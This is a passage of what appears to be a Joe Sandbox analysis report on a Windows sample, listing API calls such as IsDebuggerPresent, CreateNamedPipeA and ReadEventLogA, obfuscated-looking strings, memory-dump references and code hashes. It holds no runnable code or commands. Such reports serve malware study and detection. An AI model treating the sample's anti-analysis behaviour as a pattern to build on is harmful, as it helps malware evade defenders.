• Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Time$DirectoryFile_calloc$AliasesConsoleCreateCurrentEnvironmentEventFreeInfoLocalOpenProcessStrings_memset$ByteCharCommCompareComputerConfigCountDateDefaultDestroyEnumErrorFormatsHandleHeapHostnameIconIncrementInterlockedLastLengthLibraryLoadLocaleModuleMoveMultiNameNamedObjectPipeReadResetSizeSpecificStartupStringSystemTickTimerWaitableWideWorking_wprintf
                                                                                                                                                                                                                                                                                                                                                                  • String ID: %s %f %c$Koyotu zoxivevicoyin dixiyutije$Pev$Ruz$jejalasejipakeyijinikekicelilup$royariciguvecogowaditumihavozofilacuhadaxedayexecojafalanocitikogeduluwanifapu$sekiziguleguhu$tasazonobuwesixit$tl_
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 989382441-2729520857
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 17dbf90c6575a7b1dc114b5eed1772f5fe5563bf3d4e22f23bf0fbeb77b7ecc1
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7cd02226622226ffa38fea76c291b95a36f1beab47ba32808e6d4245b6711607
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17dbf90c6575a7b1dc114b5eed1772f5fe5563bf3d4e22f23bf0fbeb77b7ecc1
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68A13171945304EFEB30DB94DD4AB997B74BB24706F1041ABF2096A2E0D7B05A88DF26
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0040E1C7,?,0040D0C0,?,000000BC,?), ref: 0040DB9D
                                                                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0040E1C7,?,0040D0C0,?,000000BC,?), ref: 0040DBC6
                                                                                                                                                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,0040E1C7,?,0040D0C0,?,000000BC,?), ref: 0040DBDA
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ab0a5585f4728f4b083ab0203c76dcd914c290c613830b8fb672953e76dfbeaf
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e12e2266f2c5597963a076cac34a773335f46e64fde83a4c903977557fcff6cd
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab0a5585f4728f4b083ab0203c76dcd914c290c613830b8fb672953e76dfbeaf
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18017535A0560BBAEB219BE5EC05F5B77B8AF00759F210067F401F11C0EBB8EB49965D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• IsDebuggerPresent.KERNEL32 ref: 004016F1
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00401706
• UnhandledExceptionFilter.KERNEL32(005D3200), ref: 00401711
• GetCurrentProcess.KERNEL32(C0000409), ref: 0040172D
• TerminateProcess.KERNEL32(00000000), ref: 00401734
Memory Dump Source
• Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_572.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID:
• API String ID: 2579439406-0
• Opcode ID: 6183995e8a9234be8f72c8ec433727ed1f4409292c1d0f17acdd460962d8939a
• Instruction ID: 14569deebbe99a70443352391f945edaa80685d3f17305dbca174a7e4b935e44
• Opcode Fuzzy Hash: 6183995e8a9234be8f72c8ec433727ed1f4409292c1d0f17acdd460962d8939a
• Instruction Fuzzy Hash: 4021BBB49022469BC761DFA5E98D6453BB4BB29311F40405BE908972B0E7745A8DEF06
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 005CB990: HeapAlloc.KERNEL32(00000000,00000000,00000000,005CBA80), ref: 005CB9A7
  • Part of subcall function 005CB990: LoadLibraryA.KERNEL32(00000000), ref: 005CB9AF
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005CBA8B
• ReadEventLogA.ADVAPI32(00000000,00000000,00000000,?,00000000,?,?), ref: 005CBAA8
• CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005CBABE
• FileTimeToLocalFileTime.KERNEL32 ref: 005CBADE
Memory Dump Source
• Source File: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_572.jbxd
Similarity
• API ID: FileTime$AllocCreateEnvironmentEventFreeHeapLibraryLoadLocalNamedPipeReadStrings
• String ID:
• API String ID: 1576183245-0
• Opcode ID: 076db8a4f83312987f1905256bfbc6c88339437fdf71772ccd15141eed5dfc8e
• Instruction ID: f214a78d01e731fb2b2b09246ad61fa8e859b9e9d03b3fea04ee85f7849c3906
• Opcode Fuzzy Hash: 076db8a4f83312987f1905256bfbc6c88339437fdf71772ccd15141eed5dfc8e
• Instruction Fuzzy Hash: 90012D712093059FD360DF54DC8AF9AB7A8FBA8705F00451FF2558B1A0D770654C9BA7
Uniqueness

Uniqueness Score: -1.00%

APIs
• EnumSystemLocalesA.KERNEL32(Function_0000DC53,00000001), ref: 0040E001
Memory Dump Source
• Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_572.jbxd
Similarity
• API ID: EnumLocalesSystem
• String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_000032C7), ref: 0040330E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f4d454fab585b742e79d078db1b75c7ed20682841ce97ba2a7b121d69b7d5e31
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66C17F33D4E5B24A8B36462D085827FEEA17E91B4031BC3B2DCD03F68DC62A6D8596D4
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cfb08ae918c6bbe95c4a62100c8a7c8242eaab00293a2acababb5bdea13c93a7
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53B16E33D1E5B305C735862D485822BEE626E92B4131BC3B6DCD03FACDC23AAD0996D4
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00401549), ref: 004041A8
                                                                                                                                                                                                                                                                                                                                                                  • __mtterm.LIBCMT ref: 004041B4
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403E73: DecodePointer.KERNEL32(00000005,00404316,?,00401549), ref: 00403E84
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403E73: TlsFree.KERNEL32(00000002,00404316,?,00401549), ref: 00403E9E
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403E73: DeleteCriticalSection.KERNEL32(00000000,00000000,77375810,?,00404316,?,00401549), ref: 004046CF
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403E73: _free.LIBCMT ref: 004046D2
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403E73: DeleteCriticalSection.KERNEL32(00000002,77375810,?,00404316,?,00401549), ref: 004046F9
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004041CA
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004041D7
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004041E4
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004041F1
                                                                                                                                                                                                                                                                                                                                                                  • TlsAlloc.KERNEL32(?,00401549), ref: 00404241
                                                                                                                                                                                                                                                                                                                                                                  • TlsSetValue.KERNEL32(00000000,?,00401549), ref: 0040425C
                                                                                                                                                                                                                                                                                                                                                                  • __init_pointers.LIBCMT ref: 00404266
                                                                                                                                                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(?,00401549), ref: 00404277
                                                                                                                                                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(?,00401549), ref: 00404284
                                                                                                                                                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(?,00401549), ref: 00404291
                                                                                                                                                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(?,00401549), ref: 0040429E
                                                                                                                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(Function_00003FF7,?,00401549), ref: 004042BF
                                                                                                                                                                                                                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 004042D4
                                                                                                                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(00000000,?,00401549), ref: 004042EE
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00404300
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                                                                                                                                                                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3698121176-3819984048
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cbc81ace7e8aed11d47997de51eeb62a2c9a6c79db5613dd093cfc8f1bf93a05
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0a0f7951c94fa4b33b50bd7d0535fda9b2e27fb8df27acd751501bc7d14e3bc1
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbc81ace7e8aed11d47997de51eeb62a2c9a6c79db5613dd093cfc8f1bf93a05
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5931A6729422129BCB31AFB9EC499563FA4EBA4354701013BF521A36F0DBB48448EF95
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                                                                                                                                                                                                                                                  • String ID: 0|]
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 888903860-1299851057
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5790133d6ff639bfcd36794fd8b5d889e15627640a797947bdf71ab940860c44
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 731aa1c8d6d5dfd3d485811297dd79a8d5fd6348316387e40cc81dde167a7788
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5790133d6ff639bfcd36794fd8b5d889e15627640a797947bdf71ab940860c44
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA21EA39504A01ABE7217F9AD80291B7BE4DF85794B20403FF885772E1EE399C05CE5D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0040CADC
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004047FA: __mtinitlocknum.LIBCMT ref: 00404810
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004047FA: __amsg_exit.LIBCMT ref: 0040481C
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004047FA: EnterCriticalSection.KERNEL32(?,?,?,00403EFA,0000000D), ref: 00404824
                                                                                                                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(00000000), ref: 0040CAEE
                                                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0040CB03
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405342: HeapFree.KERNEL32(00000000,00000000,?,00403FCE,00000000,?,?,00401783,00401870,?,0040113D,?,?,00000000), ref: 00405358
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405342: GetLastError.KERNEL32(00000000,?,00403FCE,00000000,?,?,00401783,00401870,?,0040113D,?,?,00000000), ref: 0040536A
                                                                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0040CB1C
                                                                                                                                                                                                                                                                                                                                                                  • ___removelocaleref.LIBCMT ref: 0040CB2B
                                                                                                                                                                                                                                                                                                                                                                  • ___freetlocinfo.LIBCMT ref: 0040CB44
                                                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0040CB61
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                                                                                                                                                                  • String ID: 0|]
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 556454624-1299851057
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8eea58b5b504349ba5ec76f70c56eb3e3b59d7e91ff100543da38d48bd871ae5
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7f7fa4578048f67398edcee87a534f6b82c7b5a3ea207e2f20094a40fb616e9d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8eea58b5b504349ba5ec76f70c56eb3e3b59d7e91ff100543da38d48bd871ae5
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF11C131501704D6DB30AFA9A886B1B77E4AF00714F20423FF485BB2D1DA7CA880DA5C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,005D5840,00000008,00403FB8,00000000,00000000,?,?,00401783,00401870,?,0040113D,?,?,00000000), ref: 00403EC1
• __lock.LIBCMT ref: 00403EF5
  • Part of subcall function 004047FA: __mtinitlocknum.LIBCMT ref: 00404810
  • Part of subcall function 004047FA: __amsg_exit.LIBCMT ref: 0040481C
  • Part of subcall function 004047FA: EnterCriticalSection.KERNEL32(?,?,?,00403EFA,0000000D), ref: 00404824
• InterlockedIncrement.KERNEL32(005D75A0), ref: 00403F02
• __lock.LIBCMT ref: 00403F16
• ___addlocaleref.LIBCMT ref: 00403F34
Strings
Memory Dump Source
• Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_572.jbxd
Similarity
• API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
• String ID: 0|]$KERNEL32.DLL
• API String ID: 637971194-1600287274
• Opcode ID: 69f06a74c447a22ada258c021a0f03cdb7258d261a95eb0f98c42ecbf1972d1b
• Instruction ID: 8f16b0255503f691f8a3e543b44cc219df7106ce82ae31dbeb5ac327894f1df1
• Opcode Fuzzy Hash: 69f06a74c447a22ada258c021a0f03cdb7258d261a95eb0f98c42ecbf1972d1b
• Instruction Fuzzy Hash: 8E015271405B00DBD720AF6AD406749BBF0BF50315F10891FE599663E0CBB4AA44DB19
Uniqueness

Uniqueness Score: -1.00%

APIs
• __getptd.LIBCMT ref: 004058A9
  • Part of subcall function 00403FDD: __getptd_noexit.LIBCMT ref: 00403FE0
  • Part of subcall function 00403FDD: __amsg_exit.LIBCMT ref: 00403FED
• __amsg_exit.LIBCMT ref: 004058C9
• __lock.LIBCMT ref: 004058D9
• InterlockedDecrement.KERNEL32(?), ref: 004058F6
• _free.LIBCMT ref: 00405909
• InterlockedIncrement.KERNEL32(023A1688), ref: 00405921
Memory Dump Source
• Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_572.jbxd
Similarity
• API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
• String ID:
• API String ID: 3470314060-0
• Opcode ID: 33181e8ec0f922a003a214b633089255946aa2815f78c07681ab6451bcf2ff92
• Instruction ID: 7f72c543f57e19f5ebbb72d3d602035d3835e0651ff43b30e1a66ef83f7e2d14
• Opcode Fuzzy Hash: 33181e8ec0f922a003a214b633089255946aa2815f78c07681ab6451bcf2ff92
• Instruction Fuzzy Hash: 27018B72902A25EBCB20AB699805B5B77A0FF04724F14412BF801B73D0DB386A51DF9A
Uniqueness

Uniqueness Score: -1.00%

APIs
• __getptd.LIBCMT ref: 0040CB9C
  • Part of subcall function 00403FDD: __getptd_noexit.LIBCMT ref: 00403FE0
  • Part of subcall function 00403FDD: __amsg_exit.LIBCMT ref: 00403FED
• __calloc_crt.LIBCMT ref: 0040CBA7
  • Part of subcall function 00401955: Sleep.KERNEL32(00000000), ref: 0040197D
• __lock.LIBCMT ref: 0040CBDD
• ___addlocaleref.LIBCMT ref: 0040CBE9
• __lock.LIBCMT ref: 0040CBFD
• InterlockedIncrement.KERNEL32(?), ref: 0040CC0D
  • Part of subcall function 0040177E: __getptd_noexit.LIBCMT ref: 0040177E
Memory Dump Source
• Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmp
